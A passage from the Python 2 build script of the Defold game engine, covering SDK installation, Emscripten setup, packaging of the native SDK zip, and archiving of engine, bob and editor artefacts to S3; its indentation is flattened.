folders.append(join(sdkfolder, 'Win32','WindowsKits','10'))
folders.append(join(sdkfolder, 'Win32','MicrosoftVisualStudio14.0','VC'))
if self.target_platform in ('armv7-android', 'arm64-android'):
folders.append(join(sdkfolder, PACKAGES_ANDROID_NDK))
folders.append(join(sdkfolder, PACKAGES_ANDROID_SDK))
for f in folders:
if not os.path.exists(f):
print "Missing SDK in", f
print "Run './scripts/build.py install_ext --platform=%s'" % self.target_platform
sys.exit(1)
def install_sdk(self):
sdkfolder = join(self.ext, 'SDKs')
target_platform = self.target_platform
if target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
# macOS SDK
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_MACOS_SDK), join(sdkfolder, PACKAGES_MACOS_SDK))
download_sdk(self,'%s/%s.darwin.tar.gz' % (self.package_path, PACKAGES_XCODE_TOOLCHAIN), join(sdkfolder, PACKAGES_XCODE_TOOLCHAIN))
if target_platform in ('armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
# iOS SDK
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_IOS_SDK), join(sdkfolder, PACKAGES_IOS_SDK))
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_IOS_SIMULATOR_SDK), join(sdkfolder, PACKAGES_IOS_SIMULATOR_SDK))
if 'win32' in target_platform or ('win32' in self.host2):
win32_sdk_folder = join(self.ext, 'SDKs', 'Win32')
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_WIN32_SDK_10), join(win32_sdk_folder, 'WindowsKits', '10') )
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_WIN32_TOOLCHAIN), join(win32_sdk_folder, 'MicrosoftVisualStudio14.0'), strip_components=0 )
# On OSX, the file system is already case insensitive, so no need to duplicate the files as we do on the extender server
if target_platform in ('armv7-android', 'arm64-android'):
host = self.host
if 'win32' in host:
host = 'windows'
elif 'linux' in host:
host = 'linux'
# Android NDK
download_sdk(self, '%s/%s-%s-x86_64.tar.gz' % (self.package_path, PACKAGES_ANDROID_NDK, host), join(sdkfolder, PACKAGES_ANDROID_NDK))
# Android SDK
download_sdk(self, '%s/%s-%s-android-30-30.0.3.tar.gz' % (self.package_path, PACKAGES_ANDROID_SDK, host), join(sdkfolder, PACKAGES_ANDROID_SDK))
if 'linux' in self.host2:
download_sdk(self, '%s/%s.tar.xz' % (self.package_path, PACKAGES_LINUX_TOOLCHAIN), join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG), format='J')
if target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios') and 'linux' in self.host2:
if not os.path.exists(join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG, 'cctools')):
download_sdk(self, '%s/%s.tar.gz' % (self.package_path, PACKAGES_CCTOOLS_PORT), join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG), force_extract=True)
build_private.install_sdk(self, target_platform)
def get_ems_dir(self):
return join(self.ext, 'SDKs', 'emsdk-' + EMSCRIPTEN_VERSION_STR)
def _form_ems_path(self):
upstream = join(self.get_ems_dir(), 'upstream', 'emscripten')
if os.path.exists(upstream):
return upstream
return join(self.get_ems_dir(), 'fastcomp', 'emscripten')
def install_ems(self):
# TODO: should eventually be moved to install_sdk
emsDir = self.get_ems_dir()
os.environ['EMSCRIPTEN'] = self._form_ems_path()
os.environ['EM_CONFIG'] = join(self.get_ems_dir(), '.emscripten')
os.environ['EM_CACHE'] = join(self.get_ems_dir(), 'emscripten_cache')
if os.path.isdir(emsDir):
print "Emscripten is already installed:", emsDir
else:
self._check_package_path()
platform_map = {'x86_64-linux':'linux','x86_64-darwin':'darwin','x86_64-win32':'win32'}
path = join(self.package_path, '%s-%s.tar.gz' % (PACKAGES_EMSCRIPTEN_SDK, platform_map.get(self.host, self.host)))
path = self.get_local_or_remote_file(path)
self._extract(path, join(self.ext, 'SDKs'))
config = os.environ['EM_CONFIG']
if not os.path.isfile(config):
self.activate_ems()
def activate_ems(self):
version = EMSCRIPTEN_VERSION_STR
if 'fastcomp' in self._form_ems_path():
version += "-fastcomp"
run.env_command(self._form_env(), [join(self.get_ems_dir(), 'emsdk'), 'activate', version, '--embedded'])
# prewarm the cache
# Although this method might be more "correct", it also takes 10 minutes more than we'd like on CI
#run.env_command(self._form_env(), ['%s/embuilder.py' % self._form_ems_path(), 'build', 'SYSTEM', 'MINIMAL'])
# .. so we stick with the old version of prewarming
# Compile a file warm up the emscripten caches (libc etc)
c_file = tempfile.mktemp(suffix='.c')
exe_file = tempfile.mktemp(suffix='.js')
with open(c_file, 'w') as f:
f.write('int main() { return 0; }')
run.env_command(self._form_env(), ['%s/emcc' % self._form_ems_path(), c_file, '-o', '%s' % exe_file])
def check_ems(self):
config = join(self.get_ems_dir(), '.emscripten')
err = False
if not os.path.isfile(config):
print 'No .emscripten file.'
err = True
emsDir = self.get_ems_dir()
if not os.path.isdir(emsDir):
print 'Emscripten tools not installed.'
err = True
if err:
print 'Consider running install_ems'
def _git_sha1(self, ref = None):
return self.build_utility.git_sha1(ref)
def _ziptree(self, path, outfile = None, directory = None):
# Directory is similar to -C in tar
if not outfile:
outfile = tempfile.NamedTemporaryFile(delete = False)
zip = zipfile.ZipFile(outfile, 'w', zipfile.ZIP_DEFLATED)
for root, dirs, files in os.walk(path):
for f in files:
p = os.path.join(root, f)
an = p
if directory:
an = os.path.relpath(p, directory)
zip.write(p, an)
zip.close()
return outfile.name
def _add_files_to_zip(self, zip, paths, directory=None, topfolder=None):
for p in paths:
if not os.path.isfile(p):
continue
an = p
if directory:
an = os.path.relpath(p, directory)
if topfolder:
an = os.path.join(topfolder, an)
zip.write(p, an)
def is_cross_platform(self):
return self.host != self.target_platform
def is_desktop_target(self):
return self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32']
# package the native SDK, return the path to the zip file
def _package_platform_sdk(self, platform):
with open(join(self.dynamo_home, 'defoldsdk.zip'), 'wb') as outfile:
zip = zipfile.ZipFile(outfile, 'w', zipfile.ZIP_DEFLATED)
topfolder = 'defoldsdk'
defold_home = os.path.normpath(os.path.join(self.dynamo_home, '..', '..'))
# Includes
includes = []
for root, dirs, files in os.walk(os.path.join(self.dynamo_home, "sdk/include")):
for file in files:
if file.endswith('.h'):
includes.append(os.path.join(root, file))
# proto _ddf.h + "res_*.h"
for root, dirs, files in os.walk(os.path.join(self.dynamo_home, "include")):
for file in files:
if file.endswith('.h') and ('ddf' in file or file.startswith('res_')):
includes.append(os.path.join(root, file))
self._add_files_to_zip(zip, includes, self.dynamo_home, topfolder)
# Configs
configs = ['extender/build.yml']
configs = [os.path.join(self.dynamo_home, x) for x in configs]
self._add_files_to_zip(zip, configs, self.dynamo_home, topfolder)
# Variants
variants = []
for root, dirs, files in os.walk(os.path.join(self.dynamo_home, "extender/variants")):
for file in files:
if file.endswith('.appmanifest'):
variants.append(os.path.join(root, file))
self._add_files_to_zip(zip, variants, self.dynamo_home, topfolder)
def _findlibs(libdir):
paths = os.listdir(libdir)
paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.a', '.dylib', '.so', '.lib', '.dll')]
return paths
def _findjars(jardir, ends_with):
paths = os.listdir(jardir)
paths = [os.path.join(jardir, x) for x in paths if x.endswith(ends_with)]
return paths
def _findjslibs(libdir):
paths = os.listdir(libdir)
paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.js',)]
return paths
def _findfiles(directory, exts):
paths = []
for root, dirs, files in os.walk(directory):
for f in files:
if os.path.splitext(f)[1] in exts:
paths.append(os.path.join(root, f))
return paths
# Dynamo libs
libdir = os.path.join(self.dynamo_home, 'lib/%s' % platform)
paths = _findlibs(libdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# External libs
libdir = os.path.join(self.dynamo_home, 'ext/lib/%s' % platform)
paths = _findlibs(libdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# Android Jars (Dynamo)
jardir = os.path.join(self.dynamo_home, 'share/java')
paths = _findjars(jardir, ('android.jar', 'dlib.jar', 'r.jar'))
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# Android Jars (external)
external_jars = ("android-support-multidex.jar",
"androidx-multidex.jar",
"android.jar")
jardir = os.path.join(self.dynamo_home, 'ext/share/java')
paths = _findjars(jardir, external_jars)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# Win32 resource files
engine_rc = os.path.join(self.dynamo_home, 'lib/%s/defold.ico' % platform)
defold_ico = os.path.join(self.dynamo_home, 'lib/%s/engine.rc' % platform)
self._add_files_to_zip(zip, [engine_rc, defold_ico], self.dynamo_home, topfolder)
# JavaScript files
# js-web-pre-x files
jsdir = os.path.join(self.dynamo_home, 'share')
paths = _findjslibs(jsdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# libraries for js-web
jsdir = os.path.join(self.dynamo_home, 'lib/js-web/js/')
paths = _findjslibs(jsdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# libraries for wasm-web
jsdir = os.path.join(self.dynamo_home, 'lib/wasm-web/js/')
paths = _findjslibs(jsdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# .proto files
for d in ['share/proto/', 'ext/include/google/protobuf']:
protodir = os.path.join(self.dynamo_home, d)
paths = _findfiles(protodir, ('.proto',))
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# pipeline tools
if platform in ('x86_64-darwin','x86_64-linux','x86_64-win32'): # needed for the linux build server
# protoc
protoc = os.path.join(self.dynamo_home, 'ext/bin/%s/protoc' % platform)
ddfc_py = os.path.join(self.dynamo_home, 'bin/ddfc.py')
ddfc_cxx = os.path.join(self.dynamo_home, 'bin/ddfc_cxx')
ddfc_cxx_bat = os.path.join(self.dynamo_home, 'bin/ddfc_cxx.bat')
ddfc_java = os.path.join(self.dynamo_home, 'bin/ddfc_java')
# protoc plugin (ddfc.py) needs our dlib_shared too
plugin_pb2 = os.path.join(self.dynamo_home, 'lib/python/plugin_pb2.py')
ddf_init = os.path.join(self.dynamo_home, 'lib/python/ddf/__init__.py')
ddf_extensions_pb2 = os.path.join(self.dynamo_home, 'lib/python/ddf/ddf_extensions_pb2.py')
ddf_math_pb2 = os.path.join(self.dynamo_home, 'lib/python/ddf/ddf_math_pb2.py')
dlib_init = os.path.join(self.dynamo_home, 'lib/python/dlib/__init__.py')
self._add_files_to_zip(zip, [protoc, ddfc_py, ddfc_java, ddfc_cxx, ddfc_cxx_bat, plugin_pb2, ddf_init, ddf_extensions_pb2, ddf_math_pb2, dlib_init], self.dynamo_home, topfolder)
# we don't want to run "pip install" on individual sdk files., so we copy the python files as-is
protobuf_files = []
for root, dirs, files in os.walk(os.path.join(self.dynamo_home, 'ext/lib/python/google')):
for f in files:
_, ext = os.path.splitext(f)
print root, f
if ext in ('.pyc',):
continue
path = os.path.join(root, f)
protobuf_files.append(path)
if not protobuf_files:
raise Exception("Failed to find python protobuf folder")
self._add_files_to_zip(zip, protobuf_files, self.dynamo_home, topfolder)
# bob pipeline classes
bob_light = os.path.join(self.dynamo_home, 'share/java/bob-light.jar')
self._add_files_to_zip(zip, [bob_light], self.dynamo_home, topfolder)
# For logging, print all paths in zip:
for x in zip.namelist():
print(x)
zip.close()
return outfile.name
return None
def build_platform_sdk(self):
# Helper function to make it easier to build a platform sdk locally
try:
path = self._package_platform_sdk(self.target_platform)
except Exception, e:
print "Failed to package sdk for platform %s: %s" % (self.target_platform, e)
else:
print "Wrote %s" % path
def build_builtins(self):
with open(join(self.dynamo_home, 'share', 'builtins.zip'), 'wb') as f:
self._ziptree(join(self.dynamo_home, 'content', 'builtins'), outfile = f, directory = join(self.dynamo_home, 'content'))
def _strip_engine(self, path):
""" Strips the debug symbols from an executable """
if self.target_platform not in ['x86_64-linux','x86_64-darwin','armv7-darwin','arm64-darwin','x86_64-ios','armv7-android','arm64-android']:
return False
sdkfolder = join(self.ext, 'SDKs')
strip = "strip"
if 'android' in self.target_platform:
ANDROID_NDK_VERSION = '20'
ANDROID_NDK_ROOT = os.path.join(sdkfolder,'android-ndk-r%s' % ANDROID_NDK_VERSION)
ANDROID_GCC_VERSION = '4.9'
if target_platform == 'armv7-android':
ANDROID_PLATFORM = 'arm-linux-androideabi'
elif target_platform == 'arm64-android':
ANDROID_PLATFORM = 'aarch64-linux-android'
ANDROID_HOST = 'linux' if sys.platform == 'linux2' else 'darwin'
strip = "%s/toolchains/%s-%s/prebuilt/%s-x86_64/bin/%s-strip" % (ANDROID_NDK_ROOT, ANDROID_PLATFORM, ANDROID_GCC_VERSION, ANDROID_HOST, ANDROID_PLATFORM)
if self.target_platform in ('x86_64-darwin','armv7-darwin','arm64-darwin','x86_64-ios') and 'linux2' == sys.platform:
strip = os.path.join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG, 'bin', 'x86_64-apple-darwin19-strip')
run.shell_command("%s %s" % (strip, path))
return True
def archive_engine(self):
sha1 = self._git_sha1()
full_archive_path = join(sha1, 'engine', self.target_platform).replace('\\', '/')
share_archive_path = join(sha1, 'engine', 'share').replace('\\', '/')
java_archive_path = join(sha1, 'engine', 'share', 'java').replace('\\', '/')
dynamo_home = self.dynamo_home
self.full_archive_path = full_archive_path
bin_dir = self.build_utility.get_binary_path()
lib_dir = self.target_platform
# upload editor 2.0 launcher
if self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32']:
launcher_name = format_exes("launcher", self.target_platform)[0]
launcherbin = join(bin_dir, launcher_name)
self.upload_to_archive(launcherbin, '%s/%s' % (full_archive_path, launcher_name))
# upload gdc tool on desktop platforms
if self.is_desktop_target():
gdc_name = format_exes("gdc", self.target_platform)[0]
gdc_bin = join(bin_dir, gdc_name)
self.upload_to_archive(gdc_bin, '%s/%s' % (full_archive_path, gdc_name))
for n in ['dmengine', 'dmengine_release', 'dmengine_headless']:
for engine_name in format_exes(n, self.target_platform):
engine = join(bin_dir, engine_name)
self.upload_to_archive(engine, '%s/%s' % (full_archive_path, engine_name))
engine_stripped = join(bin_dir, engine_name + "_stripped")
shutil.copy2(engine, engine_stripped)
if self._strip_engine(engine_stripped):
self.upload_to_archive(engine_stripped, '%s/stripped/%s' % (full_archive_path, engine_name))
if 'win32' in self.target_platform:
pdb = join(bin_dir, os.path.splitext(engine_name)[0] + '.pdb')
self.upload_to_archive(pdb, '%s/%s' % (full_archive_path, os.path.basename(pdb)))
if 'web' in self.target_platform:
engine_mem = join(bin_dir, engine_name + '.mem')
if os.path.exists(engine_mem):
self.upload_to_archive(engine_mem, '%s/%s.mem' % (full_archive_path, engine_name))
engine_symbols = join(bin_dir, engine_name + '.symbols')
if os.path.exists(engine_symbols):
self.upload_to_archive(engine_symbols, '%s/%s.symbols' % (full_archive_path, engine_name))
elif 'darwin' in self.target_platform:
engine_symbols = join(bin_dir, engine_name + '.dSYM.zip')
if os.path.exists(engine_symbols):
self.upload_to_archive(engine_symbols, '%s/%s' % (full_archive_path, os.path.basename(engine_symbols)))
zip_archs = []
if not self.skip_docs:
zip_archs.append('ref-doc.zip')
if not self.skip_builtins:
zip_archs.append('builtins.zip')
for zip_arch in zip_archs:
self.upload_to_archive(join(dynamo_home, 'share', zip_arch), '%s/%s' % (share_archive_path, zip_arch))
if self.target_platform == 'x86_64-linux':
# NOTE: It's arbitrary for which platform we archive dlib.jar. Currently set to linux 64-bit
self.upload_to_archive(join(dynamo_home, 'share', 'java', 'dlib.jar'), '%s/dlib.jar' % (java_archive_path))
if 'android' in self.target_platform:
files = [
('share/java', 'classes.dex'),
('ext/share/java', 'android.jar'),
]
for f in files:
src = join(dynamo_home, f[0], f[1])
self.upload_to_archive(src, '%s/%s' % (full_archive_path, f[1]))
resources = self._ziptree(join(dynamo_home, 'ext', 'share', 'java', 'res'), directory = join(dynamo_home, 'ext', 'share', 'java'))
self.upload_to_archive(resources, '%s/android-resources.zip' % (full_archive_path))
if self.is_desktop_target():
libs = ['dlib', 'texc', 'particle']
for lib in libs:
lib_name = format_lib('%s_shared' % (lib), self.target_platform)
lib_path = join(dynamo_home, 'lib', lib_dir, lib_name)
self.upload_to_archive(lib_path, '%s/%s' % (full_archive_path, lib_name))
sdkpath = self._package_platform_sdk(self.target_platform)
self.upload_to_archive(sdkpath, '%s/defoldsdk.zip' % full_archive_path)
def _get_build_flags(self):
supported_tests = {}
supported_tests['darwin'] = ['darwin', 'x86_64-darwin']
supported_tests['x86_64-win32'] = ['win32', 'x86_64-win32', 'arm64-nx64']
supports_tests = self.target_platform in supported_tests.get(self.host, []) or self.host == self.target_platform
skip_tests = '--skip-tests' if self.skip_tests or not supports_tests else ''
skip_codesign = '--skip-codesign' if self.skip_codesign else ''
disable_ccache = '--disable-ccache' if self.disable_ccache else ''
return {'skip_tests':skip_tests, 'skip_codesign':skip_codesign, 'disable_ccache':disable_ccache, 'prefix':None}
def get_base_platforms(self):
# Base platforms is the platforms to build the base libs for.
# The base libs are the libs needed to build bob, i.e. contains compiler code.
platform_dependencies = {'darwin': ['darwin', 'x86_64-darwin'], # x86_64-darwin from IOS fix 3dea8222
'x86_64-linux': [],
'x86_64-win32': ['win32']}
platforms = list(platform_dependencies.get(self.host, [self.host]))
if not self.host in platforms:
platforms.append(self.host)
return platforms
def _build_engine_cmd(self, skip_tests, skip_codesign, disable_ccache, prefix):
prefix = prefix and prefix or self.dynamo_home
return 'python %s/ext/bin/waf --prefix=%s %s %s %s distclean configure build install' % (self.dynamo_home, prefix, skip_tests, skip_codesign, disable_ccache)
def _build_engine_lib(self, args, lib, platform, skip_tests = False, dir = 'engine'):
self._log('Building %s for %s' % (lib, platform))
skip_build_tests = []
if skip_tests and '--skip-build-tests' not in self.waf_options:
skip_build_tests.append('--skip-tests')
skip_build_tests.append('--skip-build-tests')
cwd = join(self.defold_root, '%s/%s' % (dir, lib))
plf_args = ['--platform=%s' % platform]
run.env_command(self._form_env(), args + plf_args + self.waf_options + skip_build_tests, cwd = cwd)
def build_bob_light(self):
self._log('Building bob light')
bob_dir = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
common_dir = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.common')
sha1 = self._git_sha1()
if os.path.exists(os.path.join(self.dynamo_home, 'archive', sha1)):
run.env_shell_command(self._form_env(), "./scripts/copy.sh", cwd = bob_dir)
ant = join(self.dynamo_home, 'ext/share/ant/bin/ant')
ant_args = ['-logger', 'org.apache.tools.ant.listener.AnsiColorLogger']
if self.verbose:
ant_args += ['-v']
env = self._form_env()
env['ANT_OPTS'] = '-Dant.logger.defaults=%s/ant-logger-colors.txt' % join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test')
env['DM_BOB_EXT_LIB_DIR'] = os.path.join(common_dir, 'ext')
env['DM_BOB_CLASS_DIR'] = os.path.join(bob_dir, 'build')
s = run.command(" ".join([ant, 'clean', 'compile-bob-light'] + ant_args),
cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob'), shell = True, env = env)
if self.verbose:
print s
s = run.command(" ".join([ant, 'install-bob-light'] + ant_args), cwd = bob_dir, shell = True, env = env)
if self.verbose:
print s
def build_engine(self):
self.check_sdk()
# We want random folder to thoroughly test bob-light
# We dont' want it to unpack for _every_ single invocation during the build
os.environ['DM_BOB_ROOTFOLDER'] = tempfile.mkdtemp(prefix='bob-light-')
self._log("env DM_BOB_ROOTFOLDER=" + os.environ['DM_BOB_ROOTFOLDER'])
cmd = self._build_engine_cmd(**self._get_build_flags())
args = cmd.split()
host = self.host2
if 'x86-' in host:
host = self.host
if host == 'darwin':
host = 'x86_64-darwin'
# Make sure we build these for the host platform for the toolchain (bob light)
for lib in ['dlib', 'texc']:
skip_tests = host != self.target_platform
self._build_engine_lib(args, lib, host, skip_tests = skip_tests)
if not self.skip_bob_light:
# We must build bob-light, which builds content during the engine build
self.build_bob_light()
# Target libs to build
engine_libs = list(ENGINE_LIBS)
if host != self.target_platform:
engine_libs.insert(0, 'dlib')
if self.is_desktop_target():
engine_libs.insert(1, 'texc')
for lib in engine_libs:
if not build_private.is_library_supported(target_platform, lib):
continue
self._build_engine_lib(args, lib, target_platform)
self._build_engine_lib(args, 'extender', target_platform, dir = 'share')
if not self.skip_docs:
self.build_docs()
if not self.skip_builtins:
self.build_builtins()
if '--static-analyze' in self.waf_options:
scan_output_dir = os.path.normpath(os.path.join(os.environ['DYNAMO_HOME'], '..', '..', 'static_analyze'))
report_dir = os.path.normpath(os.path.join(os.environ['DYNAMO_HOME'], '..', '..', 'report'))
run.command(['python', './scripts/scan_build_gather_report.py', '-o', report_dir, '-i', scan_output_dir])
print("Wrote report to %s. Open with 'scan-view .' or 'python -m SimpleHTTPServer'" % report_dir)
shutil.rmtree(scan_output_dir)
if os.path.exists(os.environ['DM_BOB_ROOTFOLDER']):
print "Removing", os.environ['DM_BOB_ROOTFOLDER']
shutil.rmtree(os.environ['DM_BOB_ROOTFOLDER'])
def build_external(self):
flags = self._get_build_flags()
flags['prefix'] = join(self.defold_root, 'packages')
cmd = self._build_engine_cmd(**flags)
args = cmd.split() + ['package']
for lib in EXTERNAL_LIBS:
self._build_engine_lib(args, lib, platform=self.target_platform, dir='external')
def archive_bob(self):
sha1 = self._git_sha1()
full_archive_path = join(sha1, 'bob').replace('\\', '/')
for p in glob(join(self.dynamo_home, 'share', 'java', 'bob.jar')):
self.upload_to_archive(p, '%s/%s' % (full_archive_path, basename(p)))
def copy_local_bob_artefacts(self):
texc_name = format_lib('texc_shared', self.host2)
luajit_dir = tempfile.mkdtemp()
cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
missing = {}
def add_missing(plf, txt):
txts = []
txts = missing.setdefault(plf, txts)
txts = txts.append(txt)
for plf in [['x86_64-win32', 'x86_64-win32'], ['x86_64-linux', 'x86_64-linux'], ['x86_64-darwin', 'x86_64-darwin']]:
luajit_path = join(cwd, '../../packages/luajit-2.1.0-beta3-%s.tar.gz' % (plf[0]))
if not os.path.exists(luajit_path):
add_missing(plf[1], "package '%s' could not be found" % (luajit_path))
else:
self._extract(luajit_path, luajit_dir)
luajit_exe = format_exes('luajit-32', plf[1])[0]
luajit_exe_64 = format_exes('luajit-64', plf[1])[0]
self._copy(join(luajit_dir, 'bin/%s/%s' % (plf[0], luajit_exe)), join(cwd, 'libexec/%s/%s' % (plf[1], luajit_exe)))
self._copy(join(luajit_dir, 'bin/%s/%s' % (plf[0], luajit_exe_64)), join(cwd, 'libexec/%s/%s' % (plf[1], luajit_exe_64)))
win32_files = dict([['ext/lib/%s/%s.dll' % (plf[0], lib), 'lib/%s/%s.dll' % (plf[1], lib)] for lib in ['OpenAL32', 'wrap_oal'] for plf in [['win32', 'x86-win32'], ['x86_64-win32', 'x86_64-win32']]])
osx_files = dict([['ext/lib/%s/lib%s.dylib' % (plf[0], lib), 'lib/%s/lib%s.dylib' % (plf[1], lib)] for lib in [] for plf in [['x86_64-darwin', 'x86_64-darwin']]])
linux_files = dict([['ext/lib/%s/lib%s.so' % (plf[0], lib), 'lib/%s/lib%s.so' % (plf[1], lib)] for lib in [] for plf in [['x86_64-linux', 'x86_64-linux']]])
js_files = {}
android_files = {'share/java/classes.dex': 'lib/classes.dex',
'ext/share/java/android.jar': 'lib/android.jar'}
switch_files = {}
# This dict is being built up and will eventually be used for copying in the end
# - "type" - what the files are needed for, for error reporting
# - pairs of src-file -> dst-file
artefacts = {'generic': {'share/java/dlib.jar': 'lib/dlib.jar',
'share/builtins.zip': 'lib/builtins.zip',
'lib/%s/%s' % (self.host2, texc_name): 'lib/%s/%s' % (self.host2, texc_name)},
'android-bundling': android_files,
'win32-bundling': win32_files,
'js-bundling': js_files,
'ios-bundling': {},
'osx-bundling': osx_files,
'linux-bundling': linux_files,
'switch-bundling': switch_files}
# Add dmengine to 'artefacts' procedurally
for type, plfs in {'android-bundling': [['armv7-android', 'armv7-android'], ['arm64-android', 'arm64-android']],
'win32-bundling': [['win32', 'x86-win32'], ['x86_64-win32', 'x86_64-win32']],
'js-bundling': [['js-web', 'js-web'], ['wasm-web', 'wasm-web']],
'ios-bundling': [['armv7-darwin', 'armv7-darwin'], ['arm64-darwin', 'arm64-darwin'], ['x86_64-ios', 'x86_64-ios']],
'osx-bundling': [['x86_64-darwin', 'x86_64-darwin']],
'linux-bundling': [['x86_64-linux', 'x86_64-linux']],
'switch-bundling': [['arm64-nx64', 'arm64-nx64']]}.iteritems():
# plfs is pairs of src-platform -> dst-platform
for plf in plfs:
exes = format_exes('dmengine', plf[1]) + format_exes('dmengine_release', plf[1])
artefacts[type].update(dict([['bin/%s/%s' % (plf[0], exe), 'libexec/%s/%s' % (plf[1], exe)] for exe in exes]))
# Perform the actual copy, or list which files are missing
for type, files in artefacts.iteritems():
m = []
for src, dst in files.iteritems():
src_path = join(self.dynamo_home, src)
if not os.path.exists(src_path):
m.append(src_path)
else:
dst_path = join(cwd, dst)
self._mkdirs(os.path.dirname(dst_path))
self._copy(src_path, dst_path)
if m:
add_missing(type, m)
if missing:
print('*** NOTE! There are missing artefacts.')
print(json.dumps(missing, indent=2))
def build_bob(self):
cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
bob_dir = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
common_dir = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.common')
sha1 = self._git_sha1()
if os.path.exists(os.path.join(self.dynamo_home, 'archive', sha1)):
run.env_shell_command(self._form_env(), "./scripts/copy.sh", cwd = bob_dir)
else:
self.copy_local_bob_artefacts()
env = self._form_env()
ant = join(self.dynamo_home, 'ext/share/ant/bin/ant')
ant_args = ['-logger', 'org.apache.tools.ant.listener.AnsiColorLogger']
env['ANT_OPTS'] = '-Dant.logger.defaults=%s/ant-logger-colors.txt' % join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test')
env = self._form_env()
env['ANT_OPTS'] = '-Dant.logger.defaults=%s/ant-logger-colors.txt' % join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test')
env['DM_BOB_EXT_LIB_DIR'] = os.path.join(common_dir, 'ext')
env['DM_BOB_CLASS_DIR'] = os.path.join(bob_dir, 'build')
run.command(" ".join([ant, 'clean', 'compile'] + ant_args), cwd = bob_dir, shell = True, env = env)
run.command(" ".join([ant, 'install'] + ant_args), cwd = bob_dir, shell = True, env = env)
if not self.skip_tests:
cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test')
args = [ant, 'test-clean', 'test'] + ant_args
run.command(" ".join(args), cwd = cwd, shell = True, env = env, stdout = None)
def build_sdk(self):
tempdir = tempfile.mkdtemp() # where the sdk ends up
sha1 = self._git_sha1()
u = urlparse.urlparse(self.get_archive_path())
bucket = s3.get_bucket(u.netloc)
root = urlparse.urlparse(self.get_archive_path()).path[1:]
base_prefix = os.path.join(root, sha1)
platforms = get_target_platforms()
# Since we usually want to use the scripts in this package on a linux machine, we'll unpack
# it last, in order to preserve unix line endings in the files
if 'x86_64-linux' in platforms:
platforms.remove('x86_64-linux')
platforms.append('x86_64-linux')
for platform in platforms:
prefix = os.path.join(base_prefix, 'engine', platform, 'defoldsdk.zip')
entry = bucket.get_key(prefix)
if entry is None:
raise Exception("Could not find sdk: %s" % prefix)
platform_sdk_zip = tempfile.NamedTemporaryFile(delete = False)
print "Downloading", entry.key
entry.get_contents_to_filename(platform_sdk_zip.name)
print "Downloaded", entry.key, "to", platform_sdk_zip.name
self._extract_zip(platform_sdk_zip.name, tempdir)
print "Extracted", platform_sdk_zip.name, "to", tempdir
os.unlink(platform_sdk_zip.name)
print ""
# Due to an issue with how the attributes are preserved, let's go through the bin/ folders
# and set the flags explicitly
for root, dirs, files in os.walk(tempdir):
for f in files:
p = os.path.join(root, f)
if '/bin/' in p:
os.chmod(p, 0o755)
st = os.stat(p)
treepath = os.path.join(tempdir, 'defoldsdk')
sdkpath = self._ziptree(treepath, directory=tempdir)
print "Packaged defold sdk from", tempdir, "to", sdkpath
sdkurl = join(sha1, 'engine').replace('\\', '/')
self.upload_to_archive(sdkpath, '%s/defoldsdk.zip' % sdkurl)
shutil.rmtree(tempdir)
print "Removed", tempdir
def build_docs(self):
skip_tests = '--skip-tests' if self.skip_tests or self.target_platform != self.host else ''
self._log('Building API docs')
cwd = join(self.defold_root, 'engine/docs')
cmd = 'python %s/ext/bin/waf configure --prefix=%s %s distclean configure build install' % (self.dynamo_home, self.dynamo_home, skip_tests)
run.env_command(self._form_env(), cmd.split() + self.waf_options, cwd = cwd)
with open(join(self.dynamo_home, 'share', 'ref-doc.zip'), 'wb') as f:
self._ziptree(join(self.dynamo_home, 'share', 'doc'), outfile = f, directory = join(self.dynamo_home, 'share'))
# ------------------------------------------------------------
# BEGIN: EDITOR 2
#
def download_editor2(self):
if not self.channel:
raise Exception('No channel provided when downloading the editor')
editor_filename = "Defold-%s.zip" % self.target_platform
editor_path = join(self.defold_root, 'editor', 'target', 'editor', editor_filename)
s3_path = join(self._git_sha1(), self.channel, 'editor2', editor_filename)
self.download_from_archive(s3_path, editor_path)
def archive_editor2(self):
if not self.channel:
raise Exception('No channel provided when archiving the editor')
sha1 = self._git_sha1()
full_archive_path = join(sha1, self.channel, 'editor2')
zip_file = "Defold-%s.zip" % self.target_platform
dmg_file = "Defold-%s.dmg" % self.target_platform
zip_path = join(self.defold_root, 'editor', 'target', 'editor', zip_file)
dmg_path = join(self.defold_root, 'editor', 'target', 'editor', dmg_file)
if os.path.exists(zip_path): self.upload_to_archive(zip_path, '%s/%s' % (full_archive_path, zip_file))
